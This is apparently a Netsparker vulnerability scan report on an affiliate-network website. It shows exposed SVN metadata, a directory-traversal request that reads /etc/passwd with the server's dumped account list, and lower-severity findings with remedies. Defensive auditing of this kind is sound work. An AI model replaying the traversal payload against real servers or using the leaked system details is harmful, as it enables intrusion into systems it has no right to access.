58/dbs/!svn/ver/38013/darkblue/branches/live/www/caption.htmENDstatisticsad.htmK 25svn:wc:ra_dav:version-urlV 63/dbs/!svn/ver/38013/darkblue/branches/live/www/statisticsad.htmENDmainaff.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/mainaff.htmENDt.phpK 25svn:wc:ra_dav:version-urlV 52/dbs/!svn/ver/38013/darkblue/branches/live/www/t.phpENDdate_signup.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/date_signup.htmENDsortdesc.gifK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/sortdesc.gifENDgethtml.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/gethtml.phpENDroarcamp.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/roarcamp.htmENDxbDebug.jsK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/xbDebug.jsENDdentalplans.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/dentalplans.htmENDindex.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38669/darkblue/branches/live/www/index.htmENDadvertiser.cssK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/advertiser.cssENDapi.phpK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/api.phpENDadminTools.htmK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/adminTools.htmENDariblk.ttfK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/ariblk.ttfENDsortasc.pngK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/sortasc.pngENDstat.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/40063/darkblue/branches/live/www/stat.htmENDsexualhealth_signup.htmK 25svn:wc:ra_dav:version-urlV 70/dbs/!svn/ver/38013/darkblue/branches/live/www/sexualhealth_signup.htmENDinsurance_signup.htmK 25svn:wc:ra_dav:version-urlV 67/dbs/!svn/ver/38013/darkblue/branches/live/www/insurance_signup.htmENDftc_____.ttfK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/ftc_____.ttfENDadvfrontpage.phpK 25svn:wc:ra_dav:version-urlV 63/dbs/!svn/ver/38013/darkblue/branches/live/www/advfrontpage.phpENDbillingReturn.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/billingReturn.htmENDnutrition_signup.htmK 25svn:wc:ra_dav:version-urlV 67/dbs/!svn/ver/38013/darkblue/branches/live/www/nutrition_signup.htmENDmaintenance.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/maintenance.htmENDAIM.gifK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/AIM.gifENDmessage.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/message.htmENDinvoiceapi.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/invoiceapi.phpENDgetPaypal.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/getPaypal.htmEND4ArmJoltScript.ttfK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/4ArmJoltScript.ttfENDscripts.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/scripts.htmENDblank.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/blank.htmENDfrontpage_subpage.phpK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/frontpage_subpage.phpENDheapPing.phpK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/heapPing.phpENDsortasc.gifK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/sortasc.gifENDYahoo.gifK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/Yahoo.gifENDgroupTest.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/groupTest.htmENDgraphit.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/graphit.phpENDtechnology_signup.htmK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/technology_signup.htmENDse-guru_net-header.gifK 25svn:wc:ra_dav:version-urlV 69/dbs/!svn/ver/38013/darkblue/branches/live/www/se-guru_net-header.gifENDcustomercaread.htmK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/customercaread.htmENDadvtermsandconditions.htmK 25svn:wc:ra_dav:version-urlV 72/dbs/!svn/ver/38013/darkblue/branches/live/www/advtermsandconditions.htmENDdebt_signup.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/debt_signup.htmENDupdateLinkStatus.phpK 25svn:wc:ra_dav:version-urlV 67/dbs/!svn/ver/38013/darkblue/branches/live/www/updateLinkStatus.phpENDfavicon.icoK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/favicon.icoENDx10camp.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/x10camp.htmENDhairloss_signup.htmK 25svn:wc:ra_dav:version-urlV 66/dbs/!svn/ver/38013/darkblue/branches/live/www/hairloss_signup.htmENDgetcode.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/getcode.phpENDadWarn.htmK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/adWarn.htmENDweightloss_signup.htmK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/weightloss_signup.htmENDcheck.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/check.htmENDsid.htmK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/sid.htmENDdescribe.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/describe.htmENDconsoleViewer.phpK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/consoleViewer.phpENDfrontpage.phpK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/frontpage.phpENDunsubscribe.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/unsubscribe.htmENDdetails.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/details.htmENDedit.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/edit.htmENDpayoutDetails.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/payoutDetails.htmENDfeedSearch.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/feedSearch.phpENDpharmacy_signup.htmK 25svn:wc:ra_dav:version-urlV 66/dbs/!svn/ver/38013/darkblue/branches/live/www/pharmacy_signup.htmENDmlgraph.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/mlgraph.phpENDcodeCreator.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/codeCreator.htmENDcontroller_new.phpK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/controller_new.phpENDbanlist.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/banlist.htmENDaff.htmK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/aff.htmENDsizes.phpK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/sizes.phpENDarial.ttfK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/arial.ttfENDgaTerms.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/gaTerms.phpENDcasino_signup.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/casino_signup.htmENDgaTerms.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/gaTerms.htmENDpayoutHistory.phpK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/payoutHistory.phpENDshowCreative.htmK 25svn:wc:ra_dav:version-urlV 63/dbs/!svn/ver/38013/darkblue/branches/live/www/showCreative.htmENDcontactus.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/contactus.htmENDNoABNStatement.pdfK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/NoABNStatement.pdfENDaffiliates.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/affiliates.phpENDmovesortx.curK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/movesortx.curENDbanAdmin.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/banAdmin.htmENDtermsandconditions_adlt.htmK 25svn:wc:ra_dav:version-urlV 74/dbs/!svn/ver/38013/darkblue/branches/live/www/termsandconditions_adlt.htmENDbees.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/bees.htmENDmainadv.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/mainadv.htmENDsignup_step01_bt_LANDINGPAGE.htmK 25svn:wc:ra_dav:version-urlV 79/dbs/!svn/ver/38013/darkblue/branches/live/www/signup_step01_bt_LANDINGPAGE.htmENDstatsGraph.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/statsGraph.phpENDassetShow.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/assetShow.htmENDcontroller_old.phpK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/controller_old.phpENDcasinoonnetcamp.htmK 25svn:wc:ra_dav:version-urlV 66/dbs/!svn/ver/38013/darkblue/branches/live/www/casinoonnetcamp.htmENDwhoweare.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/whoweare.htmENDcontroller.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/controller.phpENDsubPage.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/subPage.phpEND
[High Possibility] Local File Inclusion

[High Possibility] Local File Inclusion

1 TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page. Even though Netsparker believes that there is a Local File Inclusion in here it could not confirm it.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
  • Gather usernames via /etc/password file
  • Harvest useful information from the log files such as /apache/logs/error.log or /apache/logs/access.log
  • Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.

Remedy

  • If it's possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
  • If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
  • Finally it's important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
- /index.htm

/index.htm

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%..

Parameters

Parameter Type Value
info GET 1
section GET ../../../../../CANTBEHERE/../../../../../../etc/passwd index.htm
email POST netsparker@example.com
sent POST true
submit POST 3

Request

POST /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00index.htm HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 49
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
Critical Form Served Over HTTP

Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /

/ CONFIRMED

http://darkblue.com/

Form target action

https://www.darkblue.com/index.htm

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /

/ CONFIRMED

http://darkblue.com/

Identified Field Name

loginid

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /.svn/text-base/affiliates.php.svn-base

/.svn/text-base/affiliates.php.svn-base CONFIRMED

http://darkblue.com/.svn/text-base/affiliates.php.svn-base

Identified Cookie

logintype

Request

GET /.svn/text-base/affiliates.php.svn-base HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:23:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: logintype=deleted; expires=Mon, 04-Jan-2010 17:23:57 GMT; path=/,loginid=deleted; expires=Mon, 04-Jan-2010 17:23:57 GMT; path=/,loginpass=deleted; expires=Mon, 04-Jan-2010 17:23:57 GMT; path=/
Content-Length: 0
Content-Type: text/css


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://darkblue.com/

Extracted Version

Apache/2.2.3 (CentOS)

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


